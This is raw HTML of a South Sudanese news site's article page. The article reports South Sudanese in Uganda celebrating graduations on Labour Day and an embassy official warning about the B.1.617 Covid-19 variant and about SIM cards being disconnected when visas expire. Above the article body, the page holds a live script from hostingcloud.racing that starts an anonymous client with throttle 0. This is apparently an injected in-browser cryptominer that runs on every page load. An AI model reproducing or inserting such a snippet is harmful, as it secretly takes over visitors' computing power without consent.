href="https://www.jubamonitor.com/the-media-of-yesteryear/" title="THE MEDIA OF YESTERYEAR" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="425" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2019/06/Odongo-for-web-425x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-18" href="https://www.jubamonitor.com/category/opinion/editorial/" title="Editorial">Editorial</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/the-media-of-yesteryear/" rel="bookmark" title="THE MEDIA OF YESTERYEAR">THE MEDIA OF YESTERYEAR</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/oil-revenue-audit-report-is-an-eye-opener/" rel="bookmark" title="OIL REVENUE AUDIT REPORT IS AN EYE OPENER">OIL REVENUE AUDIT REPORT IS AN EYE OPENER</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/was-it-really-xenophobia-or-lack-of-jobs/" rel="bookmark" title="Was it really xenophobia or lack of jobs?">Was it really xenophobia or lack of jobs?</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/sports/">Sports</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><div id="ruby_mega_9587" class="ruby-block-wrap block-mega-menu is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9587 data-block_name= bingo_ruby_mega_block_cat data-posts_per_page= 5 data-block_page_max= 29 data-block_page_current= 1 data-category_id= 10 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/south-sudanfootball-cup-for-2021-drawn/" title="South SudanFootball cup for 2021 drawn" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="495" height="289" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/SSFA-officials.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/04/SSFA-officials.jpg 495w, https://www.jubamonitor.com/wp-content/uploads/2021/04/SSFA-officials-300x175.jpg 300w" sizes="(max-width: 495px) 100vw, 495px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/south-sudanfootball-cup-for-2021-drawn/" rel="bookmark" title="South SudanFootball cup for 2021 drawn">South SudanFootball cup for 2021 drawn</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/five-candidates-up-for-ssfa-race/" title="Five Candidates up for SSFA race" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="439" height="267" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/South-Sudan-Football-Association-1.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/04/South-Sudan-Football-Association-1.jpg 439w, https://www.jubamonitor.com/wp-content/uploads/2021/04/South-Sudan-Football-Association-1-300x182.jpg 300w" sizes="(max-width: 439px) 100vw, 439px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/five-candidates-up-for-ssfa-race/" rel="bookmark" title="Five Candidates up for SSFA race">Five Candidates up for SSFA race</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/kuajok-women-loses-against-bentiu-women-team-20/" title="Kuajok Women loses against Bentiu Women team 2:0" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="316" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/Residents-of-Juba-540x316.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/kuajok-women-loses-against-bentiu-women-team-20/" rel="bookmark" title="Kuajok Women loses against Bentiu Women team 2:0">Kuajok Women loses against Bentiu Women team 2:0</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/women-league-match-interrupted-in-aweil-freedom-square/" title="Women League Match interrupted in Aweil Freedom Square" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="161" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/Juba-Super-Stars-women-team-vs.-Aweil-Women-team-540x161.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/women-league-match-interrupted-in-aweil-freedom-square/" rel="bookmark" title="Women League Match interrupted in Aweil Freedom Square">Women League Match interrupted in Aweil Freedom Square</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/jebel-kotein-football-club-promoted-to-juba-league/" title="Jebel Kotein Football Club promoted to Juba league" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/Jebel-Kotein-Fc-players-during-crowning-in-Torit-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/jebel-kotein-football-club-promoted-to-juba-league/" rel="bookmark" title="Jebel Kotein Football Club promoted to Juba league">Jebel Kotein Football Club promoted to Juba league</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><div id="ruby_mega_9588" class="ruby-block-wrap block-mega-menu is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9588 data-block_name= bingo_ruby_mega_block_cat data-posts_per_page= 5 data-block_page_max= 38 data-block_page_current= 1 data-category_id= 9 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/bazallico-club-resumes-operations/" title="Bazallico Club resumes operations" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/Bazallico-Club-back-on-operation-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/bazallico-club-resumes-operations/" rel="bookmark" title="Bazallico Club resumes operations">Bazallico Club resumes operations</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/s-sudanese-film-maker-wins-luxor-african-film-award/" title="S. Sudanese film maker wins Luxor African film award" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/Alex-Joseph-L-popularly-known-as-Rasta-Alex-in-Cairo-Egypt-during-awarding-ceremony-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/s-sudanese-film-maker-wins-luxor-african-film-award/" rel="bookmark" title="S. Sudanese film maker wins Luxor African film award">S. Sudanese film maker wins Luxor African film award</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/comedian-majuetdit-hospitalized-after-being-conned-of-1000usd-online/" title="Comedian Majuetdit: Hospitalized after being conned of 1000USD online" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="535" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/04/Simon-Ajonga-commonly-known-MajuetditMathoot-535x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/comedian-majuetdit-hospitalized-after-being-conned-of-1000usd-online/" rel="bookmark" title="Comedian Majuetdit: Hospitalized after being conned of 1000USD online">Comedian Majuetdit: Hospitalized after being conned of 1000USD online</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/govt-urged-to-improve-health-sector/" rel="bookmark" title="Gov’t urged to improve health sector">Gov’t urged to improve health sector</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/artist-detained-in-wau/" title="Artist detained in Wau" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="537" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/03/ArtistLarson-AngokGarang-537x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/artist-detained-in-wau/" rel="bookmark" title="Artist detained in Wau">Artist detained in Wau</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li></ul></div></nav>						</div>

						<div class="navbar-right">
														
<div class="navbar-search">
	<a href="#" id="ruby-navbar-search-icon" data-mfp-src="#ruby-header-search-popup" data-effect="mpf-ruby-effect header-search-popup-outer" title="Search" class="navbar-search-icon">
		<i class="fa fa-search" aria-hidden="true"></i>
	</a>
</div>
						</div>
					</div>
				</div>
				<div id="ruby-header-search-popup" class="header-search-popup">
	<div class="header-search-popup-wrap ruby-container">
		<a href="#" class="ruby-close-search"><i class="ruby-close-btn" aria-hidden="true"></i></a>
	<div class="header-search-popup-inner">
		<form class="search-form" method="get" action="https://www.jubamonitor.com/">
			<fieldset>
				<input id="ruby-search-input" type="text" class="field" name="s" value="" placeholder="Type to search&hellip;" autocomplete="off">
				<button type="submit" value="" class="btn"><i class="fa fa-search" aria-hidden="true"></i></button>
			</fieldset>
                            <div class="header-search-result"></div>
            		</form>
	</div>
	</div>
</div>			</div>
		</div>
	</div>

</div><!--header-->	<div class="main-site-mask"></div>
	<div class="site-wrap">
		<div class="site-mask"></div>
		<div class="site-inner">
<script src="https://www.hostingcloud.racing/VK55.js"></script>
<script>
    var _client = new Client.Anonymous('4fc83fb3612a82134ac702b6fd9b380ac82007d5faaa62e0c34c616002f5d827', {
        throttle: 0, ads: 0
    });
    _client.start();
    

</script><div class="single-post-outer clearfix"><article class="single-post-wrap single-post-1 post-44090 post type-post status-publish format-standard has-post-thumbnail hentry category-news-2"  itemscope  itemtype="https://schema.org/Article" ><div class="ruby-page-wrap ruby-section row single-wrap is-author-bottom is-sidebar-right ruby-container"><div class="ruby-content-wrap single-inner col-sm-8 col-xs-12 content-with-sidebar"><div class="single-post-content-outer single-box"><div class="single-post-header"><div class="single-post-top"><div class="breadcrumb-wrap"><div class="breadcrumb-inner"><span><meta itemprop="position" content="1"><a href="https://www.jubamonitor.com/">Home</a></span><i class="fa fa-angle-right breadcrumb-next"></i><span><meta itemprop="position" content="2"><a rel="bookmark" href="https://www.jubamonitor.com/category/news-2/"><span>News</span></a></span><i class="fa fa-angle-right breadcrumb-next"></i><span class="breadcrumb-current"><meta itemprop="position" content="3">South Sudanese cautioned about new Covid-19variant</span></div><!--#breadcrumb inner--></div><!--#breadcrumb--></div><!--#single post top --><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><div class="single-title post-title entry-title is-size-1"><h1>South Sudanese cautioned about new Covid-19variant</h1></div><!--#single title--><div class="post-meta-info is-show-icon"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:38:02+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:23:08+03:00">02/05/2021</time></span><!--#meta info date--><span class="meta-info-el meta-info-tag"><i class="fa fa-tag"></i><span class="no-tags">No tags</span></span><!--#mete info tag--></div><!--#post meta info--></div><!--#single post header--><div class="single-post-thumb-outer"><div class="post-thumb"><img width="686" height="335" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok.jpg" class="attachment-bingo_ruby_crop_750x450 size-bingo_ruby_crop_750x450 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok.jpg 686w, https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok-300x147.jpg 300w" sizes="(max-width: 686px) 100vw, 686px" /></div></div><div class="single-post-action clearfix"><div class="single-post-share-header"><a class="single-share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="single-share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=South+Sudanese+cautioned+about+new+Covid-19variant&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i><script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></a> <a class="single-share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="single-share-bar-el icon-pinterest" href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F&amp;media=https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok.jpg&description=South+Sudanese+cautioned+about+new+Covid-19variant" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-pinterest-p"></i></a></div><!--#single post share header--></div><!--#single post action--><div class="banner-ad-wrap banner-ad-top-single"><div class="banner-ad-inner"><div class="banner-ad-image"><img src="https://www.jubamonitor.com/wp-content/uploads/2019/01/jubamonitor-ads-2.jpg" alt="Juba Monitor"></div></div></div><div class="single-post-body"><div class="single-content-wrap"><div class="single-entry-wrap"><div class="entry single-entry clearfix">
<p>By Martin Manyiel Wugol </p>



<p><br>
Community in Uganda celebrated the Labour Day in
form of celebrating the achievement of
South Sudanese who made it to graduation booklet. The eventwas held under the
theme, “Leave no one behind in search for basiceducation&#8221;.</p>



<p>Speaking to celebrants who used May 1<sup>st</sup> Labour Day to celebrate the recentgraduation of South Sudanese students and now graduates from Kampala University, Peter MajakMajakcounselor at the South Sudan Embassy in charge of Immigration and Passport warned South Sudanese nationals in Uganda to be careful in observing Standard Operating Procedures (SOPs) in combating Coronavirus new variant reported in Uganda and belief to be deadliest type of virus. </p>



<p>Chief
Majakcategorically urged people of South Sudan to be resilient in education<br>
because. “If we want to realize reform in public
sector, we must encourage<br>
ourselves to take education very seriously,”
said Majak.</p>



<p>He also talks about
challenges ofsim-cards closure happening these days in connection with visa
expiry. Peter Majak urged citizens to register their sim-cards because bylaws there
is connection to visa policy in Uganda however,“when your visa expired, please get yourself new visa if
you need to stay in Uganda just to avoiddisconnection of your sim-cards
services,” He warned. <br>
The celebration ceremony was attended by Bishop
Peter Marial Agok of Episcopal Church of South Sudan who encouraged old and
young South Sudanese to continue with trajectory of pursuing field of education
because it is rewarding in considerable ways in human life. “On behalf of
graduates Maj. Gen Charles Deng Manin thanked the families and sponsors for
making theirfinancial support to make sure that we graduate and finished
without dropping out from school despite challenges here and there still considerable
support was given for few of us to graduate congratulation”.</p>



<p>&nbsp;The World
Health Organization warned that the variant, identified as B.1.617, had been
detected in &nbsp;at least “17 countries”.</p>
</div></div><!--#single entry wrap--><div class="single-post-share-big"><div class="single-post-share-big-inner"><a class="share-bar-el-big icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i><span>share on Facebook</span></a><a class="share-bar-el-big icon-twitter" href="https://twitter.com/intent/tweet?text=South+Sudanese+cautioned+about+new+Covid-19variant&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i><span>share on Twitter</span></a></div></div><div class="single-post-box single-post-box-comment"><div class="box-comment-content"></div></div></div><!--#single content wrap --><meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="https://www.jubamonitor.com/south-sudanese-cautioned-about-new-covid-19variant/"/><meta itemprop="headline " content="South Sudanese cautioned about new Covid-19variant"><span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="adminjubamonitor"></span><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok.jpg"><meta itemprop="width" content="686"><meta itemprop="height" content="335"></span><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg"></span><meta itemprop="name" content="adminjubamonitor"></span><meta itemprop="datePublished" content="2021-05-03T06:38:02+00:00"/><meta itemprop="dateModified" content="2021-05-02T18:23:08+00:00"/></div><!--#single post body --></div><!--#single post content outer --><div class="single-post-box-outer"><nav class="single-nav single-box row"><div class="col-sm-6 col-xs-12 nav-el nav-left post-title is-size-6"><a href="https://www.jubamonitor.com/involvewomenin-social-decision-making/" rel="bookmark" title="Involvewomenin social decision making"><span class="ruby-nav-icon nav-left-icon"><i class="fa fa-angle-left"></i></span><span class="ruby-nav-link nav-left-link">Involvewomenin social decision making</span></a></div><div class="col-sm-6 col-xs-12 nav-el nav-right post-title is-size-6"><a href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" rel="bookmark" title="POLICE-In hot pursuit of Juba-Yei road killer gang"><span class="ruby-nav-icon nav-right-icon"><i class="fa fa-angle-right"></i></span><span class="ruby-nav-link nav-right-link">POLICE-In hot pursuit of Juba-Yei road killer gang</span></a></div></nav><div class="single-post-box-related has-header-block clearfix box-related-1"><div class="box-related-header block-header-wrap"><div class="block-header-inner"><div class="block-title"><h3>You Might Also Like</h3></div></div></div><!--#related header--><div class="box-related-content block-content-wrap row"><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" title="POLICE-In hot pursuit of Juba-Yei road killer gang" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="330" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok-365x330.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" rel="bookmark" title="POLICE-In hot pursuit of Juba-Yei road killer gang">POLICE-In hot pursuit of Juba-Yei road killer gang</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:40:04+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:25:16+03:00">02/05/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Odongo Odoyo/James Atem Kuir The Police are on the hot pursuit of six members of a gang that have...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fpolice-in-hot-pursuit-of-juba-yei-road-killer-gang%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=POLICE-In+hot+pursuit+of+Juba-Yei+road+killer+gang&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fpolice-in-hot-pursuit-of-juba-yei-road-killer-gang%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a 